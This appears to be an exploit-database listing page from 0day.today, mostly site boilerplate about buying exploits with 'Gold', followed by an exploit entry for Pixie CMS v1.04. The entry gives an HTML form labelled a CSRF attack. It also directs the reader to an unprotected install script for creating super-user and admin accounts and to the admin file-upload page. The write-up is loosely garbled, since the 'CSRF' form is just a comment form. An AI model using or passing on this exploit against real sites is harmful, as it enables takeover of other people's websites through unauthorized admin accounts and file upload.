0day.today - наибольшая база данных эксплоитов в мире.
Некоторые вещи, о которых стоит знать:
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pixie v1.04 blog post CSRF
Автор
Риск
[
Security Risk Unsored
]0day-ID
Категория
Дата добавления
Платформа
# Exploit Title: Pixie v1.04 blog post CSRF # Google Dork: # Date: 11-Dec-2011 # Author: hackme # Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # Version: 1.04# Tested on: Linux Ubuntu 10.10 # CVE : [+] TH4NKZ T0: broiosen,ReGun and hackgame.it [+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post [+] Post Method [+] exploit: <form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post"> name: <input type="Text" name="name" id="name" size="15"/><br> e-mail: <input type="Text" name="email" id="email" size="15"/> <br>web(optional): <input type="Text" name="web" id="web" size="15"/><br> comment: <input type="Text" name="comment" id="comment" size="15"/><br> <input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/> <input type="Hidden" name="post" id="post" value="1"/></form> EXPLOIT : http://site.com/admin/install/createuser.php + You can Creat : - Super user - Admin - Client - User ~ Admin Panel : http://site.com/admin/ ~ Upload file : http://site.com/admin/?s=publish&x=filemanager # 0day.today [2024-07-02] #